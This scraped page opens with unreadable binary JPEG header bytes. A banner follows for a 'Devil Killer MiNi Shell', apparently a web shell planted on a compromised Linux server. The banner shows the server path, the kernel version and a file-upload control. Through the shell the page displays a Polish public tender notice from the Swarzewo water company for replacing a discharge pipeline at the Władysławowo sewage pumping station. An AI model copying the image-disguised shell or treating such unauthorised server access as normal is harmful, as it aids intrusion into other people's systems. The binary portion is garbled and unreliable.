JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230131/0007175601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wymiana rurociągu tłocznego w hali pomp przepompowni ścieków „Władysławowo” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Spółka Wodno-Ściekowa &#34;Swarzewo&#34;</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zamawiający</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000888037</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Władysławowska 84</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Swarzewo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 600 87 29 12</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@sws-swarzewo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.sws-swarzewo.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka Wodno - Ściekowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana rurociągu tłocznego w hali pomp przepompowni ścieków „Władysławowo” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0570d8c7-a13a-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00071756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://sws-swarzewo.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://sws-swarzewo.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje techniczne o Platformie Przetargowej:<br/><br/>Wymagania techniczne sporządzania, wysyłania i odbierania korespondencji elektronicznej przy użyciu Platformy Przetargowej:<br/>Dopuszczalne przeglądarki internetowe:<br/>Internet Explorer 10 i nowsze, Edge,<br/>Google Chrome,<br/>Mozilla Firefox,<br/>Opera.<br/>Pozostałe wymagania techniczne:<br/>	dostęp do sieci Internet,<br/>	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>	włączona obsługa JavaScript,<br/>	zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>	zainstalowany Acrobat Reader,<br/>	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>Formaty przesyłanych danych<br/>Format danych przekazywanych za pośrednictwem Platformy Przetargowej wskazany został w § 2 ust. 1 i 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (udostępniono na stronie postępowania).<br/>Zamawiający rekomenduje przesyłanie plików w formacie danych: .pdf, podpisanych (tam, gdzie taki obowiązek wynika z przepisów prawa) kwalifikowanym podpisem elektronicznym - wewnętrznym (jeśli Wykonawca używać będzie kwalifikowanego podpisu elektronicznego). W przypadku zastosowania podpisu zewnętrznego, należy pamiętać o obowiązku dołączenia do pliku dokumentu także pliku podpisującego, który <br/>generuje się automatycznie podczas złożenia podpisu. Zamawiający rekomenduje również kompresowanie plików dopiero po ich wcześniejszym podpisaniu.<br/>Kodowanie i oznaczenie czasu przekazania danych. Aktualna data i godzina, zsynchronizowana z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu okna Platformy Przetargowej. Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie oferty/dokumentu przez Wykonawcę. W przypadku wybrania opcji złożenia oferty/dokumentu bez logowania, potwierdzenie odbywa się poprzez kliknięcie w link dostępny w wiadomości mailowej, wysłanej automatycznie po złożeniu oferty/dokumentu. Wykonawca otrzymuje wiadomość na adres e-mail wskazany <br/>w formularzu. W przypadku Wykonawcy zalogowanego na Platformie Przetargowej, czas przekazania danych jest to czas wysłania oferty/dokumentu przez Platformę Przetargową.<br/>Maksymalny łączny rozmiar wszystkich plików przesyłanych jednocześnie za pośrednictwem Platformy Przetargowej wynosi 150 MB. <br/>Szczegółowe instrukcje rejestracji, udziału w postępowaniu, w tym zadawania pytań do dokumentów zamówienia oraz składania, zmiany lub wycofania oferty znajdują się na stronie Platformy Przetargowej w zakładce INSTRUKCJE.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja o przetwarzaniu danych osobowych.<br/>1.	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie <br/>o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że: <br/>b)	Administratorem Pani/Pana danych osobowych jest Spółka Wodno – Ściekowa „Swarzewo”, ul. Władysławowska 84, 84-100 Swarzewo, www.sws-swarzewo.pl;<br/>c)	Dane kontaktowe Inspektora Ochrony Danych:<br/> Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować poprzez email: biuro@sws-swarzewo.pl lub korespondencyjnie na adres: Spółka Wodno – Ściekowa „Swarzewo”, ul. Władysławowska 84, 84-100 Swarzewo. <br/>Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych;<br/>d)	Pani/Pana dane osobowe przetwarzane będą w celu dopełnienia obowiązków określonych w przepisach prawa art. 6 ust 1 pkt c RODO na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz.U. 2019 poz. 1843).<br/>e)	Pani/Pana dane osobowe mogą być udostępnianie inny odbiorcą, podmiotom uprawnionym na podstawie przepisów prawa (np. Urząd Zamówień Publicznych) <br/>f)	Pani/Pana dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej. <br/>g)	Pani/Pana dane osobowe będą przechowywane przez okres 5 lat, licząc od końca roku kalendarzowego, w którym upłynął termin płatności podatku. <br/>h)	Posiada Pani/Pan prawo dostępu do treści swoich danych oraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawo do przenoszenia danych, prawo wniesienia sprzeciwu, prawo do cofnięcia zgody w dowolnym momencie bez wpływu na zgodność z prawem przetwarzania (jeżeli przetwarzanie odbywa się na podstawie zgody), którego dokonano na podstawie zgody przed jej cofnięciem;<br/>i)	Ma Pan/Pani prawo wniesienia skargi do Urzędu Ochrony Danych Osobowych gdy uzna Pani/Pan, iż przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016 r.;<br/>j)	Pani/Pana dane osobowe nie będą przetwarzane w sposób zautomatyzowany i nie będą profilowane.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRT/01/01/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: <br/>Wymiana rurociągu tłocznego w hali pomp przepompowni ścieków „Władysławowo” ”, zlokalizowanej we Władysławowie powiat pucki,<br/> przy ul. Portowej 4.<br/>1. Szczegółowy opis przedmiotu zamówienia określa: PFU – Program Funkcjonalno – Użytkowy - załącznik nr 1 do SWZ oraz Przedmiar Robót stanowiący załącznik nr 2 do SWZ. <br/>2.	W przypadku rozbieżności pomiędzy PFU i Przedmiarem Robót należy wystąpić do zamawiającego o ich wyjaśnienie.<br/>3.	W przypadku, gdy dokumentacja techniczna nie podaje w sposób szczegółowy technologii wykonywania robót lub wykonania określonego elementu przedmiotu zamówienia, bądź też nie precyzują dostatecznie rodzaju i standardu materiałów, wykonawca zobowiązany jest wystąpić do zamawiającego o wyjaśnienie. <br/>4.	Szczegółowe wymagania dotyczące warunków realizacji przedmiotu zamówienia zawierają projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy stanowiące załącznik nr 3 do SWZ.<br/>5.	Zaleca się, aby wykonawca dokonał wizji lokalnej w miejscu, gdzie mają być wykonywane roboty budowlane. <br/>6.	Zamawiający nie dopuszcza możliwości składania oferty wariantowej.<br/>7.	Zamawiający nie dopuszcza możliwości składania oferty częściowej. Zamówienie publiczne nie zostało podzielone na części ze względów ekonomicznych. Połączenie wykonania przebudowy i budowy ulic ma na celu obniżenie kosztów realizacji zadania poprzez możliwość uzyskanie wysokich rabatów przez wykonawcę na zamawiane materiały oraz stworzenie jednego zaplecza budowy jak również ustanowienie jednego kierownictwa dla całego zamówienia. Ponadto umożliwia to ujednolicenie ulic przez nadanie jednorodnego wyglądu zewnętrznego oraz zastosowanie takich samych materiałów, co pozwoli obniżyć koszty obsługi i serwisu po okresie gwarancji. <br/>8.	Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232410-9 - Roboty w zakresie kanalizacji ściekowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Opis kryteriów oceny ofert i sposobu oceny ofert.<br/>1.	Ocenie podlegają jedynie oferty niepodlegające odrzuceniu.<br/>2.	Zamawiający dokona wyboru oferty najkorzystniejszej na podstawie następujących kryteriów oceny ofert: <br/><br/>l.p.	Nawa kryterium	waga<br/>1.	Cena oferty 60 %<br/>2.	Okres gwarancji jakości i rękojmi za wady	40 %<br/><br/><br/><br/>3.	Sposób oceny ofert.<br/><br/>UWAGA: <br/>Ocena zostanie dokonana na podstawie informacji wykazanych w formularzu oferty, którego wzór stanowi załącznik nr 4 do SIWZ. <br/><br/><br/><br/>1)	Cena oferty (C).<br/><br/>Ocenie podlega wskazana w formularzu oferty cena oferty brutto za przedmiot zamówienia. Ocenę – 60 pkt otrzyma oferta z najniższą ceną. Pozostałe oferty z wyższymi cenami zostaną ocenione według wzoru: <br/> <br/><br/><br/> najniższa cena oferty spośród ofert <br/> niepodlegających odrzuceniu<br/>C (liczba punktów oferty badanej) = --------------------------- x 100 x 60 % <br/> cena oferty badanej<br/><br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku podatkowego zamawiającego, zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów <br/>i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami. <br/>Tak obliczona kwota będzie podstawą obliczenia punktów w kryterium oceny ofert „cena oferty”.<br/> <br/>2) Okres gwarancji jakości i rękojmi za wady (G).<br/><br/>Ocenie podlega wskazany w formularzu oferty okres gwarancji jakości i rękojmi za wady na przedmiot zamówienia.<br/>Wymagany minimalny okres gwarancji jakości i rękojmi za wady wynosi 36 miesięcy - oferta wykonawcy, który zaoferuje okres krótszy okres gwarancji i rękojmi za wady zostanie odrzucona.<br/>Okres gwarancji jakości i rękojmi za wady należy określić w miesiącach w liczbach całkowitych wskazując ilość miesięcy okresu gwarancji jakości i rękojmi za wady. <br/>W przypadku gdy wykonawca nie zadeklaruje w formularzu oferty okresu gwarancji jakości zamawiający uzna, że wykonawca oferuje minimalny okres gwarancji jakości wymagany przez zamawiającego, tj. 36 miesięcy.<br/>Maksymalny okres gwarancji jakości i rękojmi za wady, który zostanie uwzględniony do oceny ofert wynosi 60 miesiące. Wykonawca, który zaoferuje okres gwarancji jakości i rękojmi za wady dłuższy niż 60 miesiące otrzyma maksymalną liczbę punktów tj. 40 pkt. <br/>Termin gwarancji jakości i rękojmi za wady rozpoczyna bieg z dniem odbioru końcowego przedmiotu zamówienia.<br/><br/>Zamawiający przyzna dodatkowe punkty za przedłużenie okresu gwarancji jakości i rękojmi za wady zgodnie ze wzorem: <br/><br/><br/><br/><br/> okres gwarancji oferty badane<br/> liczba punktów oferty badanej = ---------------------------- x 100 x 40 % <br/> najdłuższy zaoferowany okres gwarancji <br/> jednak nie więcej niż 60 miesięcy<br/><br/>Zamawiający przyzna punkty według następujących zasad: 1 punkt = 1%, maksymalna liczba punktów – 40.<br/><br/>4.	Punkty uzyskane przez ofertę za poszczególne kryteria wyboru zostaną zsumowane. Wybrana zostanie oferta, która spełnia wszystkie wymagania określone w niniejszej specyfikacji istotnych warunków zamówienia i uzyskała największą liczbę punktów. Oferta może otrzymać maksymalnie 100 punktów.<br/><br/>Ostateczny ranking ofert wyliczony zostanie według wzoru C + G gdzie: <br/><br/>C - Ilość punktów za cenę oferty <br/>G - Ilość punktów za okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia może ubiegać się wykonawca, który spełnia następujące warunki udziału w postępowaniu;<br/><br/>1.1	sytuacja ekonomiczna lub finansowa; <br/>Zamawiający nie określa warunku w tym zakresie.<br/><br/>1.2	zdolność techniczna lub zawodowa;<br/><br/>1.2.1.	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich pięciu lat licząc wstecz od dnia, w którym upływa termin składania ofert, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, co najmniej jedno zamówienie, w zakresie: budowy lub modernizacji lub przebudowy lub remontu pompowni ścieków o wydajności co najmniej 800 m³/h, o wartości nie mniejszej niż 100 000,00 zł. brutto.<br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia oraz gdy wykonawca polega na zdolnościach innych podmiotów na zasadach określonych <br/>w art. 118 ust. 1 ustawy Prawo zamówień publicznych, wymóg wykonania zamówienia winien wykazać samodzielnie co najmniej jeden wykonawca.<br/><br/>1.2.2.	Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje osobą, która będzie uczestniczyć w wykonywaniu zamówienia pełniąc następujące funkcje;<br/>a)	kierownik robót sanitarnych – 1 osoba spełniająca następujące wymagania:<br/>posiadanie uprawnień sanitarne bez ograniczeń lub opowiadające im uprawnienia równoważne uprawniające do kierowania robotami budowlanymi związanymi z obiektem budowlanym, takim jak:<br/>•	sieci i instalacje cieplne<br/>•	sieci i instalacje wentylacyjne<br/>•	sieci i instalacje gazowe<br/>•	sieci i instalacje wodociągowe oraz kanalizacyjne<br/>Uwagi:<br/>1)	Przez uprawnienia budowlane należy rozumieć uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. – Prawo budowlane (Dz.U.2020.1333) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. <br/><br/>2)	w sprawie w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831). <br/>3)	Przez uprawnienia równoważne należy rozumieć odpowiadające wskazanym uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa lub odpowiadające im uprawnienia uznane na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r. poz. 65), których zakres uprawnia do pełnienia <br/>4)	wskazanej funkcji przy realizacji przedmiotu zamówienia.<br/>5)	Przez kierownika budowy rozumieć kierownika budowy w rozumieniu ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (Dz.U.2020.1333).<br/>6)	Zamawiający dopuszcza łączenie wyżej wskazanych funkcji pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji. <br/>7)	W przypadku, gdy podmiot trzeci, którego potencjałem wspiera się wykonawca realizował zamówienie, w zakres którego wchodziły roboty budowlane określone wyżej wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby podmiot trzeci udostępniający potencjał wykonawcy faktycznie uczestniczył w realizacji ww. zakresu robót budowlanych.<br/>8)	W przypadku, gdy zamówienie, w zakres którego wchodzą roboty budowlane, o których mowa wyżej były realizowane przez wykonawcę wspólnie z innym podmiotem, nie ubiegającym się o udzielenie zamówienia, zamawiający wymaga, aby wykonawca składający ofertę w niniejszym postępowaniu faktycznie uczestniczył w realizacji ww. zakresu robót budowlanych. <br/>9)	Wartość robót budowlanych podaną w walutach innych niż PLN, zamawiający przeliczy wg Tabeli A kursów średnich walut obcych Narodowego Banku Polskiego w dniu zakończenia robót – jeżeli w tym dniu Narodowy Bank Polski nie podał średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty podany pierwszego dnia po dniu zakończenia robót budowlanych.<br/>2.	Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności 